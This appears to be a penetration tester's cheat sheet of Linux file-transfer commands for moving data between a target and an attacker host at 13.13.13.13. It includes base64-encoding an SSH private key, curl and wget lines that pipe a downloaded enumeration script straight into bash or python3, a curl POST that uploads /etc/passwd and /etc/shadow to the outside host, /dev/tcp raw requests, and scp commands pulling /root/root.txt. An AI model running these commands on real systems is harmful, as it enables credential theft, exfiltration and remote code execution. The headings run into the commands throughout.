Linux
BASE64
Check MD5 Hash
md5sum id_rsaEncode
In this example we are encoding SSH Key to Base64
cat id_rsa |base64 -w 0;echoDecode
echo -n 'justimaginethisissomerandomhashbecauseyoudontcareandidontcare=` | base64 -d > id_rsaCURL
Regular Download
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.shFileless Download
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bashMultiple File Upload
curl -X POST https://13.13.13.13/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecureWGET
Regular Download
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.shFileless Download
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3Upload
Mechanism is similar to Windows web upload using uploadserver module:
sudo python3 -m pip install --user uploadserverSecure HTTPS Web Server
Start Web Server
sudo python3 -m pip install --user uploadserverCreate a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'Start Web Server
mkdir https && cd httpssudo python3 -m uploadserver 443 --server-certificate /root/server.pemAlternative Methods
Creating a Web Server with Python3
python3 -m http.serverCreating a Web Server with Python2.7
python2.7 -m SimpleHTTPServerCreating a Web Server with PHP
php -S 0.0.0.0:8000Creating a Web Server with Ruby
ruby -run -ehttpd . -p8000Bash(/dev/tcp)
Connect to the Target Webserver
exec 3<>/dev/tcp/13.13.13.13/80HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3Print the Response
cat <&3SCP
SSH is a protocol that allows secure access to remote computers. And we could use SCP utility which uses SSH protocol for transferring files
Preparation
Enabling the SSH Server
sudo systemctl enable sshStarting the SSH Server
sudo systemctl start sshChecking for SSH Listening Port
netstat -lnptDownload
scp sreed@13.13.13.13.:/root/root.txt .Upload
scp /etc/passwd rio@13.13.13.13:/home/plaintext/Last updated